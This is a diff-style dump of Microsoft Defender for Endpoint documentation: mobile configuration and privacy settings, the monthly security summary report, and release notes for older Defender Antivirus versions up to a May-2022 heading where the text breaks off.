-# Resources for Microsoft Defender for Endpoint for mobile devices
-
-Microsoft Defender for Endpoint provides multiple capabilities on mobile devices. Some of these capabilities are set to default, and some require admin configuration. The following table shows how to configure the resources related to Microsoft Defender for Endpoint on Android and iOS.
-
-## Feature configurations
-
-| Configuration| Description | Android AE config key | Android MAM | iOS |
-|--|-|--|-|--|
-|Web Protection|Admins can use this setting to change the web protection feature. When disabled, end users aren't asked for VPN permissions|Antiphishing = 0/1 (default), VPN = 0/1(default)|Antiphishing=0/1(default), VPN = 0/1(default)| WebProtection = true (default) / false|
-|Network Protection| Network protection is disabled by default. Admins can enable it to include rogue WiFi and certificate detection (only available on android) on mobile.|Enable Network protection in Microsoft Defender = 0(default)/1| DefenderNetworkProtectionEnable = 0(default)/1|DefenderNetworkProtectionEnable = 0(default)/1|
-
-## Privacy configuration
-
-|Configuration| Description | Android AE config key | Android MAM | iOS |
-|-|-|--|-|--|
-|Privacy for phishing alert report |If privacy is enabled, Defender for Endpoint won't send domain name and website details| Hide URLs in report=0(default)/1| DefenderExcludeURLInReport = 0(default)/1 |DefenderExcludeURLInReport = 0(default)/1|
-|Configure Privacy for malware threat report| Control the collection of app details (name, package information) in the threat report |Hide app details in report= 0(default)/1|DefenderExcludeAppInReport = 0(default)/1|
-|Configure privacy in vulnerability assessment of apps| Control what app data shows up in the security portal when Defender for Vulnerability Management is enabled|Enable Vulnerability Management privacy= 0(default)/1|DefenderTVMPrivacyMode = 0(default)/1|DefenderTVMPrivacyMode = 0(default)/1|
-|Network protection | Control the collection of network and certificate details in the alert report|Enable Network protection privacy = 1/0 |DefenderNetworkProtectionPrivacy = 1/0 |DefenderNetworkProtectionPrivacy |
-
-## Other configurations
-
-|Configuration| Description | Android AE config key | Android MAM | iOS |
-|-|-|--|-|--|
-|Disable/enable sign out| Sign out option can be disabled for an end user. This helps prevent tampering with the device.|Disable sign out = 1(default)/0 |DisableSignOut = 1/0 |DisableSignOut = 1/0 |
-|Device tagging| Defender for Endpoint enables bulk tagging mobile devices during onboarding. Admins can set up tags using this configuration by using Intune.|Device tag (Value as String)|DefenderDeviceTag (Value as String) |DefenderDeviceTag (Value as String)|
-|Optional Permissions| Admins can make some permissions optional for the end user while onboarding Defender for Endpoint. Users see an option to grant these permissions later.| NA|DefenderOptionalVPN = 0(default)/1, DefenderOptionalAccessibility = 0(default)/1|DefenderOptionalVPN = 0(default)/1, DefenderOptionalAccessibility = 0(default)/1|
-
-## Alerts severity and privacy information
-
-|Alert type | Severity | Privacy information (Android)| Privacy information (iOS)|
-|--|--|||
-|Anti-phishing (Defender warning)|Informational| URL of malicious connection, connection information, Protocol type; [More information](android-privacy.md#web-page--network-information) | Domain name, IP address of malicious website; [More information](ios-privacy.md#web-page-or-network-information) |
-|Anti-phishing (Defender warning overlooked)|Low | | |
-|Anti-malware| Medium | Information about malicious APKs including install source, storage location, time of install, etc.; [More information](android-privacy.md#app-information)
-| |
-|Jailbreak| High | NA |NA |
-|Rogue Wifi | Low | | |
-|Open Network detection | Informational | | |
-Suspicious certificates |Informational| | |
-
-[Complete privacy information for Android](android-privacy.md)
-
-[Complete privacy information for iOS](ios-privacy.md)
-
-## Microsoft Defender Mobile App exclusion from Conditional Access(CA) Policies
-
-Microsoft Defender Mobile app is a security app that needs to constantly be running in the background to report the device security posture. This security posture is used in the Compliance and App Protection policies to secure the managed apps and ensure that corporate data is accessed only in a secured device. However, with restrictive Conditional Access policies such as having Block policies based on certain locations, or enforcing frequent sign ins can result in Defender blocked from reporting posture. If the Defender app fails to report the device posture this can lead to situation where the device is under a threat, leading to vulnerability of corporate data on the device. To ensure seamless protection, we recommend excluding the Defender app from the blocking Conditional Access Policy.
-
-### Apps required to exclude
-
-1. **Xplat Broker App ( a0e84e36-b067-4d5c-ab4a-3db38e598ae2)**
-Xplat Broker App is the application responsible for forwarding Defender risk signals to the Defender backend. However, the presence of restrictive CA policies can result in Defender blocked from reporting signals. In these scenarios, we recommend excluding the Xplat Broker App. Note, that **Xplat Broker App** is also used by other platforms like Mac and Linux. So if the policy is same for these platforms, it is better to create a separate Conditional Access policy for Mobile.
-
-2. **TVM app (e724aa31-0f56-4018-b8be-f8cb82ca1196)**
-Microsoft Defender for Mobile TVM (Threat and Vulnerability Management) is the service, which provides the vulnerability assessment for the installed apps on the iOS devices. However, the presence of restrictive CA policies can result in Defender blocked from communicating the onboarding requests to the TVM backend services. This service should be excluded if MDVM (Vulnerability Assessment) is used in the organization.
-
-### Steps to exclude
-
-1. Create service principal for the apps that needs to be excluded. [Steps to create service principal.](/graph/api/serviceprincipal-post-serviceprincipals?view=graph-rest-1.0&tabs=powershell#request&preserve-view=true).
-
-1. While creating the service principal object above, use these app IDs: **Xplat Broker App ( a0e84e36-b067-4d5c-ab4a-3db38e598ae2), TVM app (e724aa31-0f56-4018-b8be-f8cb82ca1196)**.
-
-1. After the object is successfully created the two apps are visible in the CA screen and can be excluded.
-
- :::image type="content" source="media/mobile-resources-defender-endpoint/appexclusion.png" alt-text="Image displaying Application exclusions.":::
security Monthly Security Summary Report https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/monthly-security-summary-report.md
- Title: Monthly security summary reporting in Microsoft Defender for Endpoint
-description: Use the monthly security summary to see threats detected and prevented, current status from Microsoft Secure Score, and recommended actions.
---
-localization_priority: Normal
Previously updated : 06/12/2023---- m365-security-- tier2----
-# Monthly security summary report in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
--
-The report helps organizations get a visual summary of key findings and overall preventative actions taken to enhance the organization's overall security posture completed in the last month. It helps you identify areas of strength and improvement, track your progress over time, and prioritize your actions based on risk and impact.
-
-To access this report, in the navigation pane, choose **Reports > Endpoints > Monthly Security Summary**. The monthly security summary report contains the following sections:
--- [Microsoft Secure Score](#microsoft-secure-score)-- [Secure score compared to other organizations](#secure-score-compared-to-other-organizations)-- [Devices onboarded](#devices-onboarded)-- [Protection against threats](#protection-against-threats)-- [Web content monitoring and filtering](#web-content-monitoring-and-filtering)-- [Suspicious or malicious activities](#suspicious-or-malicious-activities)--
-You can generate a PDF report of the summary, by selecting **Generate PDF report**. The generated report is a summary of the last 30 days.
-
-## Microsoft Secure score
-Microsoft Secure Score is a measurement of an organization's security posture and how well you have implemented security best practices and recommendations across the devices in your organization. The secure score card shows how the overall cybersecurity strength of an organization has improved in the past month and how it compares to other companies with similar number of managed devices.
-
-## Secure score compared to other organizations
-This score is an evaluation of an organization's security score in relation to organizations of a similar size. It's a way to benchmark an organization's performance in implementing security measures compared to other organizations of an equivalent size.
--
-## Devices onboarded
-The devices card provides information on the number of devices that were onboarded in the last month as well as devices still not onboarded. Onboarding devices are essential for enabling protection and detection capabilities.
-
-## Protection against threats
-This card shows how effective your defenses are against common attack vectors such as phishing and ransomware. A higher number indicates better defense in place against phishing and ransomware. The report shows how many threats were blocked or mitigated in the last month and how your protection level has increased.
-
-## Web content monitoring and filtering
-Shows the number of malicious URLs that were blocked by Microsoft Defender for Endpoint in the last month. The report also shows the categories of URLs that were blocked and the number of clicks for each category.
-
-## Suspicious or malicious activities
-Track how many incidents and alerts were resolved in the past month using the incidents card. The card also shows all active incidents and alerts that require attention. You'll also be able to see a list of the top 10 severe incidents, their status, number of alerts, and the impacted devices and users.
--
-
security Msda Updates Previous Versions Technical Upgrade Support https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/msda-updates-previous-versions-technical-upgrade-support.md
- Title: Microsoft Defender Antivirus updates - Previous versions for technical upgrade support
-description: Understand the type of technical support offered for previous versions of Microsoft Defender Antivirus
---- Previously updated : 04/03/2024---- m365-security-- tier1-- mde-ngp----
-# Microsoft Defender Antivirus updates - Previous versions for technical upgrade support only
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-Microsoft regularly releases [security intelligence updates and product updates for Microsoft Defender Antivirus](microsoft-defender-antivirus-updates.md). It's important to keep Microsoft Defender Antivirus up to date. When a new package version is released, support for the previous two versions is reduced to technical support only. Versions that are older than the previous two versions are listed in this article and are provided for technical upgrade support only.
-
-## November-2023 (Platform: 4.18.23110.3 | Engine: 1.1.23110.2)
--- Security intelligence update version: **1.403.7.0**-- Release date: **December 5, 2023 (Platform)** / **December 6, 2023 (Engine)**-- Platform: **4.18.23110.3**-- Engine: **1.1.23110.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed PowerShell cmdlet [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) to show the correct date/time for `AntivirusSignatureLastUpdated`-- Resolved deadlock issue that occurred on systems with multiple filter drivers reading a file when the file is copied-- Added the `InitializationProgress` field to [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) output-- Fixed installation failure on Windows Server 2016 due to existing Defender EventLog registry key-- Added the ability to have [quick scans](schedule-antivirus-scans.md) ignore Microsoft Defender Antivirus exclusions-- Fixed remediation for long running [on-demand scans](run-scan-microsoft-defender-antivirus.md) where the service may have been restarted-- Fixed an issue with Microsoft Defender Vulnerability Management to allow the execution of a [blocked application](/microsoft-365/security/defender-vulnerability-management/tvm-block-vuln-apps) when the [warn option](/microsoft-365/security/defender-vulnerability-management/tvm-block-vuln-apps#block-or-warn-mitigation-action) is selected-- Added support for managing schedule day/time for [signature updates in Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-windows#updates) and [Defender for Endpoint security settings management](/mem/intune/protect/mde-security-integration)-- Fixed non-standard signature path loading across platforms ([Windows](microsoft-defender-antivirus-windows.md), [Mac](microsoft-defender-endpoint-mac.md), [Linux](microsoft-defender-endpoint-linux.md), [Android](microsoft-defender-endpoint-android.md), and [iOS](microsoft-defender-endpoint-ios.md))-- Improved handling of cached detections in [attack surface reduction](overview-attack-surface-reduction.md) capabilities-- Improved performance for enumerating virtual memory ranges-
-### Known issues
--- None-
-## October-2023 (Platform: 4.18.23100.2009 | Engine: 1.1.23100.2009)
--- Security intelligence update version: **1.401.3.0**-- Release date: **November 3, 2023 (Engine) / November 6, 2023 (Platform)**-- Platform: **4.18.23100.2009**-- Engine: **1.1.23100.2009**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved processing of environment variables in protected folders list for [controlled folder access](controlled-folders.md)-- Improved performance of [on-access scanning](configure-advanced-scan-types-microsoft-defender-antivirus.md) of files with Mark of the Web (MoTW)-- Added support for Active Directory device groups with [device control](device-control-overview.md)-- Fixed an issue so that [ASROnlyPerRuleExclusions](/windows/client-management/mdm/defender-csp#configurationasronlyperruleexclusions) don't apply during an engine reboot-- [Microsoft Defender Core service overview](microsoft-defender-core-service-overview.md) is generally available for consumer devices and is coming soon for business customers.-- Fixed an issue with device control so that device control policies remain enforced when a platform update requires a reboot-- Improved performance of [device control for printing scenarios](device-control-policies.md)-- Fixed truncation issue in the output of [MpCmdRun.exe -scan](command-line-arguments-microsoft-defender-antivirus.md) (processing Unicode characters)-
-### Known issues
--- None-
-## September-2023 (Platform: 4.18.23090.2008 | Engine: 1.1.23090.2007)
--- Security intelligence update version: **1.399.44.0**-- Release date: **October 3, 2023 (Engine) | October 4, 2023 (Platform)**-- Platform: **4.18.23090.2008**-- Engine: **1.1.23090.2007**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed automatic remediation during on demand scans involving archives with multiple threats-- Improved the performance of scanning files on network locations-- Added support for domain computer SID for device control policies-- Improved installer of unified agent to include legacy version of Windows Server 2012 (6.3.9600.17735)-- Fixed issue in device control when querying Microsoft Entra group membership, which resulted in increased network traffic.-- Improved parsing of attack surface reduction exclusions in the antimalware engine-- Improved reliability in scanning PE files-- Improved deployments safeguards for security intelligence updates-
-### Known issues
--- None-
-## August-2023 (Platform: 4.18.23080.2006 | Engine: 1.1.23080.2005)
--- Security intelligence update version: **1.397.59.0**-- Released: **August 30, 2023 (Platform and Engine)**-- Platform: **4.18.23080.2006**-- Engine: **1.1.23080.2005**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed an issue where Microsoft Defender Antivirus switched from [passive mode to active mode](microsoft-defender-antivirus-windows.md#comparing-active-mode-passive-mode-and-disabled-mode) following an update on Windows Server 2016 and Windows Server 2012 R2 [onboarded using the modern, unified client](configure-server-endpoints.md)-- Fixed an issue where [exclusions](defender-endpoint-antivirus-exclusions.md) weren't applied correctly using [gpupdate](/windows-server/administration/windows-commands/gpupdate) when registry policy processing was set to process even if Group Policy Objects didn't change-- Excluded IP addresses can now be configured using [Intune](/windows/client-management/mdm/defender-csp#configurationexcludedipaddresses)-- Improved [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) on Windows Server 2016-- [DisableFtpParsing](/windows/client-management/mdm/defender-csp#configurationdisableftpparsing) can now be configured through [Set-MpPreference](/powershell/module/defender/set-mppreference)-- Fixed an issue where [device control](device-control-overview.md) policies weren't applied correctly without a reboot following product updates-- Fixed an issue in the attack surface reduction rule, [Block Win32 API calls from Office macros](attack-surface-reduction-rules-reference.md#block-win32-api-calls-from-office-macros), configured in warn mode where excluded files were incorrectly blocked until the next device reboot-
-### Known issues
--- None-
-## July-2023 (Platform: 4.18.23070.1004 | Engine: 1.1.23070.1005)
--- Security intelligence update version: **1.395.30.0**-- Released: **August 9, 2023 (Engine and Platform)**-- Platform: **4.18.23070.1004**-- Engine: **1.1.23070.1005**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved output for [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus) if scan results fail to retrieve-- Extended management options for configuring security intelligence updates with Intune, Group Policy, and PowerShell-- Extended management options for disabling IOAV scans over the network using Intune, Group Policy, and PowerShell. The new setting is `ApplyDisableNetworkScanningToIOAV` for [Set-MpPreference](/powershell/module/defender/set-mppreference).-- Improved the Unified agent installation process to handle [MsMpEng.exe](troubleshooting-mode-scenarios.md#scenario-2-high-cpu-usage-due-to-windows-defender-msmpengexe) debugger extensions, if present-- Fixed an issue pertaining to showing the exclusions list with PowerShell [Get-MpPreference](/powershell/module/defender/get-mppreference) on systems managed by Intune-- Fixed warn notifications for two attack surface reduction rules ([Block Office applications from injecting code into other processes](attack-surface-reduction-rules-reference.md#block-office-applications-from-injecting-code-into-other-processes) and [Block credential stealing from the Windows local security authority subsystem](attack-surface-reduction-rules-reference.md#block-credential-stealing-from-the-windows-local-security-authority-subsystem))-- Fixed an issue with running `Update-MpSignature -UpdateSource:MMPC` when using a nonelevated PowerShell console (see [Update-MpSignature](/powershell/module/defender/update-mpsignature))-- Fixed an issue with [ASR rules deployed via Intune](enable-attack-surface-reduction.md#intune) to display accurately in the Microsoft Defender portal-- Fixed [tamper protection management](prevent-changes-to-security-settings-with-tamper-protection.md) for customers who have Microsoft 365 E3 or [Defender for Endpoint Plan 1](defender-endpoint-plan-1.md)-- Improved installation and uninstallation logic on Server SKUs using the modern, unified agent (see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md))-- Fixed an issue where `AntivirusSignatureLastUpdated` was incorrect when executing [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus)-- Addressed a deadlock caused by Microsoft Defender Antivirus in rare cases-- Added `ProcessId` to ASR Warn exclusion events (see [ASR rules configuration summary card](attack-surface-reduction-rules-report.md#asr-rules-configuration-summary-card))-- Fixed an issue where values specified in [ThreatSeverityDefaultAction](/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-threatseveritydefaultaction) weren't honored intermittently-- Improved error reporting in the [modern, unified agent installer](configure-server-endpoints.md#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution)-- Fixed the overriding logic in the ASR rule [Block all Office applications from creating child processes](attack-surface-reduction-rules-reference.md#block-all-office-applications-from-creating-child-processes) configured in warn mode-- Added support for scanning Zstandard (Zstd) containers/archives-
-### Known issues
--- None-
-## May-2023 *UPDATE* (Platform: 4.18.23050.9)
-
-*Microsoft has released a platform update (**4.18.23050.9**) for the May 2023 release.*
--- Security intelligence update version: **1.393.1315.0**-- Released: **July 24, 2023 (Platform only)**-- Platform: **4.18.23050.9**-- Engine: **1.1.23060.1005**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed a regression where HTTP requests were being handled sequentially, causing high latency for [network protection](network-protection.md) scenarios-- Fixed a bug where DNS requests with empty authority records were being improperly parsed-
-## June-2023 (Engine: 1.1.23060.1005)
--- Security intelligence update version: **1.393.71.0**-- Released: **July 10, 2023 (Engine only)**-- Engine: **1.1.23060.1005**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed an issue with [ASR rules deployed via Intune](/mem/intune/protect/endpoint-security-asr-policy) to display accurately in the Microsoft Defender portal-- Fixed a performance issue when building and validating the Microsoft Defender Antivirus cache-- Improved performance by removing redundant exclusion checks-
-### Known Issues
--- See [May-2023 *UPDATE* (Platform: 4.18.23050.9 | Engine: 1.1.23060.1005)](#may-2023-update-platform-418230509) for platform updates.-
-## May-2023 *UPDATE* (Platform: 4.18.23050.5 | Engine: 1.1.23050.2)
-
-*Microsoft released a platform update (**4.18.23050.5**) for the May 2023 release, followed by [an additional update](#may-2023-update-platform-418230509).*
--- Security intelligence update version: **1.391.860.0**-- Released: **June 12, 2023**-- Platform: **4.18.23050.5**-- Engine: **1.1.23050.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed issue that could lead to resolution of incorrect service endpoint-
-### Known Issues
--- Users encounter slow loading webpages in non-Microsoft web browsers with [web content filtering](/microsoft-365/security/defender-endpoint/web-content-filtering) enabled-
-## May-2023 (Platform: 4.18.23050.3 | Engine: 1.1.23050.2)
--- Security intelligence update version: **1.391.64.0**-- Released: **May 31, 2023**-- Platform: **4.18.23050.3**-- Engine: **1.1.23050.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- New version format for Platform and Engine (see the [April-2023 update](#whats-new))-- Improved processing of SmartLockerMode-- Fixed input parameters for DefinitionUpdateChannel cmdlet in [Set-MpPreference](/powershell/module/defender/set-mppreference)-- Improved installation experience for [Windows Server 2012 R2 and Windows Server 2016](microsoft-defender-antivirus-on-windows-server.md)-- Added ability to disable Defender task maintenance tasks programmatically-- Fixed WDFilter 0x50 bug check-- Fixed print enforcement issue for device control-- Fixed scan randomization issue when setting Intune policy-- Fixed sense offboarding on Windows Server 2016 when [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) is enabled-- Fixed inconsistent results of caching files with the internal Defender file cache-- Augmented attack surface reduction telemetry with more data related to an ASR detection-- Removed Image File Execution Options (IFEO) debugger value during installation, which can be used to prevent service starts-- Fixed memory leaked in ASR logic-- Improved validation guard-rail for Malicious Software Removal Tool (MSRT) releases-
-### Known Issues
--- Potential issue that could lead to resolution of incorrect service endpoint-
-## April-2023 (Platform: 4.18.2304.8 | Engine: 1.1.20300.3)
--- Security intelligence update version: **1.387.2997.0**-- Release date: **May 2, 2023 (Engine) / May 2, 2023 (Platform)**-- Platform: **4.18.2304.8**-- Engine: **1.1.20300.3**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- **Beginning in May 2023, the Platform and Engine version schema have a new format**. Here's what the new version format looks like:
- - Platform: `4.18.23050.1`
- - Engine: `1.1.23050.63000`
-- Fixed memory leak in behavior monitoring-- Improved resiliency of signature loading and platform updates-- Quarantine and restore support for [WMI](use-wmi-microsoft-defender-antivirus.md)-- Fixed attack surface reduction rule output with [Get-MpPreference](/powershell/module/defender/get-mppreference)-- Fixed MSERT to only use release engine version-- Improved the enforcement of exclusions-- Added support for enabling real-time protection and signature updates during OOBE-- Fixed localization for Defender events-- Deprecated real-time signature delivery setting-- Updated missing setting (ValidateMapsConnection) in [MpCmdRun.exe](command-line-arguments-microsoft-defender-antivirus.md)-- Fixed abandoned threats in the Windows Security app-- Fixed a service-hang issue that caused invalid outputs to display in [Get-MpComputerStatus](/powershell/module/defender/get-mpcomputerstatus)-
-### Known issues
--- None--
-## March-2023 (Platform: 4.18.2303.8 | Engine: 1.1.20200.4)
--- Security intelligence update version: **1.387.695.0**-- Release date: **April 4, 2023 (Engine) / April 11, 2023 (Platform)**-- Platform: **4.18.2303.8**-- Engine: **1.1.20200.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Beginning in April 2023, monthly platform and engine version release information (in this article) now includes two dates: Engine and Platform-- Increased file hash support-- Added support to protect registry keys against parent keys abuse-- Improved tamper protection of registry keys against parent keys abuse-- Improved log handling for DLP and Device Control-- Improved performance on developer drives-
-### Known issues
--- None-
-## February-2023 (Platform: 4.18.2302.7 | Engine: 1.1.20100.6)
--- Security intelligence update version: **1.385.68.0**-- Release date: **March 27, 2023**-- Platform: **4.18.2302.7**-- Engine: **1.1.20100.6**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Fixed attack surface reduction rule output with [Get-MpPreference](/powershell/module/defender/get-mppreference)-- Fixed threat DefaultAction outputs in Get-MpPreference-- Improved Defender performance during file copy operations for .NET applications-- Fixed [Microsoft Defender Vulnerability Management](/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management) app block warn feature-- Added opt-in feature to allow users seeing exclusions-- Fixed [ASR](overview-attack-surface-reduction.md) warn policy-- Increased maximum size for quarantine archive file to 4 GB-- Improvements to threat remediation logic-- Improved [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) hardening for temporary exclusions-- Fixed time zone calculation in [Defender PowerShell](/powershell/module/defender) module-- Fixed merging logic for exclusions in Defender PowerShell module-- Improvements in the [contextual exclusions](/microsoft-365/security/defender-endpoint/configure-contextual-file-folder-exclusions-microsoft-defender-antivirus) syntax-- Improved scheduled scan robustness-- Improved serviceability for internal database files-- Enhanced certificate indicators determination logic-- Enhanced memory usage-
-### Known Issues
--- None--
-## January-2023 (Platform: 4.18.2301.6 | Engine: 1.1.20000.2)
--- Security intelligence update version: **1.383.26.0**-- Release date: **February 14, 2023**-- Platform: **4.18.2301.6**-- Engine: **1.1.20000.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved [ASR rule](attack-surface-reduction-rules-reference.md) processing logic-- Updated Sense token hardening-- Improved [Defender CSP](/windows/client-management/mdm/defender-csp) module update channel logic-
-### Known Issues
--- None-
-## November-2022 (Platform: 4.18.2211.5 | Engine: 1.1.19900.2)
--- Security intelligence update version: **1.381.144.0**-- Release date: **December 8, 2022**-- Platform: **4.18.2211.5**-- Engine: **1.1.19900.2**-- Support phase: **Technical upgrade support (only)**--
-### What's new
--- Enhanced threat protection capabilities-- Improved [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) capabilities-- Enhanced enabling of tamper protection for newly onboarded devices-- Improved reporting for [cloud protection](cloud-protection-microsoft-defender-antivirus.md)-- Improved [controlled folder access](controlled-folders.md) notifications-- Improved scanning of network shares-- Enhanced processing of host files containing a wild card-- Improved performance for [scan events](customize-run-review-remediate-scans-microsoft-defender-antivirus.md)-
-### Known Issues
--- None-
-## October-2022 (Platform: 4.18.2210.6 | Engine: 1.1.19800.4)
--- Security intelligence update version: **1.379.4.0**-- Release date: **November 10, 2022**-- Platform: **4.18.2210.6**-- Engine: **1.1.19800.4**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Addressed a quality issue that could result in poor responsiveness/usability-- Improved hang detection in antivirus engine-- Improved [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) capability-- Changed threat & vulnerability management (TVM)-warn and TVM-block action to block to resolve Intune's report-- Removed Clean Action from Intune policy for `ThreadSeverityDefaultAction`-- Added randomize scheduled task times configuration to Intune policy-- Added manageability for `DisableSMTPParsing` network protection-- Added improvement for behavior monitoring-- Normalized date format for event 1151 for Windows Defender-- Fixed a deadlock related to updating `\device\cdrom*` exclusions upon mounting a cdrom drive under certain conditions-- Improved PID information for threat detection-
-### Known Issues
--- None--
-## September-2022 (Platform: 4.18.2209.7 | Engine: 1.1.19700.3)
--- Security intelligence update version: **1.377.8.0**-- Release date: **October 10, 2022**-- Platform: **4.18.2209.7**-- Engine: **1.1.19700.3**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Improved processing of Defender fallback order on Server SKU-- Fixed Defender updates during OOBE process-- Fixed Trusted Installer security descriptor vulnerability-- Fixed [Microsoft Defender Antivirus exclusions](configure-exclusions-microsoft-defender-antivirus.md) visibility-- Fixed output of fallback order of the PowerShell cmdlet-- Fixed Defender Platform update failure on Server Core 2019 SKUs-- Improved hardening support for Defender disablement configurations on Server SKUs-- Improved Defender configuration logics for [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) on servers-- Improved WARN mode for [ASR rule](attack-surface-reduction-rules-reference.md)-- Improved certificate handling of OSX-- Improved logging for scanning FilesStash location-- Beginning with platform version 4.18.2208.0 and later: If a server has been onboarded to Microsoft Defender for Endpoint, the "Turn off Windows Defender" [group policy setting](configure-endpoints-gp.md#update-endpoint-protection-configuration) will no longer completely disable Windows Defender Antivirus on Windows Server 2012 R2 and later operating systems. Instead, it is either ignored (if [ForceDefenderPassiveMode](switch-to-mde-phase-2.md#set-microsoft-defender-antivirus-to-passive-mode-on-windows-server) is configured explicitly) or it places Microsoft Defender Antivirus into [passive mode](microsoft-defender-antivirus-windows.md#comparing-active-mode-passive-mode-and-disabled-mode) (if `ForceDefenderPassiveMode` isn't configured). Moreover, [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) allows a switch to active mode via changing `ForceDefenderPassiveMode` to `0`, but not to passive mode. These changes apply only to servers onboarded to Microsoft Defender for Endpoint. For more information, please refer to [Microsoft Defender Antivirus compatibility with other security products](/microsoft-365/security/defender-endpoint/microsoft-defender-antivirus-compatibility#microsoft-defender-antivirus-and-non-microsoft-antivirusantimalware-solutions)-
-### Known Issues
--- Some customers might have received platform updates 4.18.2209.2 from preview. It can cause the service to get stuck at the start state after the update.-
-## August-2022 (Platform: 4.18.2207.7 | Engine: 1.1.19600.3)
--- Security intelligence update version: **1.373.1647.0**-- Release date: **September 6, 2022**-- Platform: **4.18.2207.7**-- Engine: **1.1.19600.3**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Starting with platform version 4.18.2207.7, the default behavior of dynamic signature expiration reporting changes to reduce potential 2011 event notification flooding. See: **Event ID: 2011** in [Review event logs and error codes to troubleshoot issues with Microsoft Defender Antivirus](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/)-- Fixed Unified agent installer issues on WS2012R2 Server and Windows Server 2016-- Fixed remediation issue for custom detection-- Fixed Race condition related to behavior monitoring-- Resolved multiple deadlock scenarios in Defender dlls-- Improved frequency of Windows toasts notification for ASR rules-
-### Known Issues
--- None-
-## July-2022 (Platform: 4.18.2207.5 | Engine: 1.1.19500.2)
--- Security intelligence update version: **1.373.219.0**-- Release date: **August 15, 2022**-- Platform: **4.18.2207.5**-- Engine: **1.1.19500.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
--- Performance improvement for [hybrid sleep](/windows-hardware/customize/power-settings/sleep-settings-hybrid-sleep) delay when Microsoft Defender Antivirus is active-- Fixed client detection behavior related to custom [certificate blocking indicators of compromise](indicator-certificates.md)-- Performance improvement for [AntiMalware Scan Interface (AMSI)](/windows/win32/amsi/antimalware-scan-interface-portal) caching-- Improved detection and remediation for [Microsoft Visual Basic for Applications](/office/vba/language/concepts/getting-started/64-bit-visual-basic-for-applications-overview) (VBA) related macros-- Improved processing of AMSI exclusions-- Fixed deadlock detection in Host Intrusion Prevention System (HIPS) rule processing. (For more information about HIPS and Defender for Endpoint, see [Migrating from a third-party HIPS to ASR rules](migrating-asr-rules.md).)-- Fixed memory leak where `MsMpEng.exe` was consuming private bytes. (If high CPU usage is also an issue, see [High CPU usage due to Microsoft Defender Antivirus](troubleshooting-mode-scenarios.md))-- Fixed deadlock with [behavior monitoring](configure-real-time-protection-microsoft-defender-antivirus.md)-- Improved trust validation-- Fixed engine crash issue on legacy operating platforms-- Performance Analyzer v3 updates: Added top path support, scan skip information, and OnDemand scan support. See [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).-- Defender performance improvements during file copy operations-- Added improvements for [troubleshooting mode](enable-troubleshooting-mode.md)-- Added fix for Defender WINEVT channels across update/restarts. (For more information about WINEVT, see [Windows Event Log](/windows/win32/api/_wes/).)-- Added fix for [Defender WMI management](use-wmi-microsoft-defender-antivirus.md) bug during startup/updates-- Added fix for duplicated 2010/2011 in the [Windows Event Viewer Operational events](/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus/)-- Added support for [Defender for Endpoint](microsoft-defender-endpoint.md) stack processes token hardening-
-### Known Issues
--- Customers deploying platform update 4.18.2207.5 might experience lagging network performance that could impact applications.-
-## May-2022 (Platform: 4.18.2205.7 | Engine: 1.1.19300.2)
--- Security intelligence update version: **1.369.88.0**-- Released: **June 22, 2022**-- Platform: **4.18.2205.7**-- Engine: **1.1.19300.2**-- Support phase: **Technical upgrade support (only)**-
-### What's new
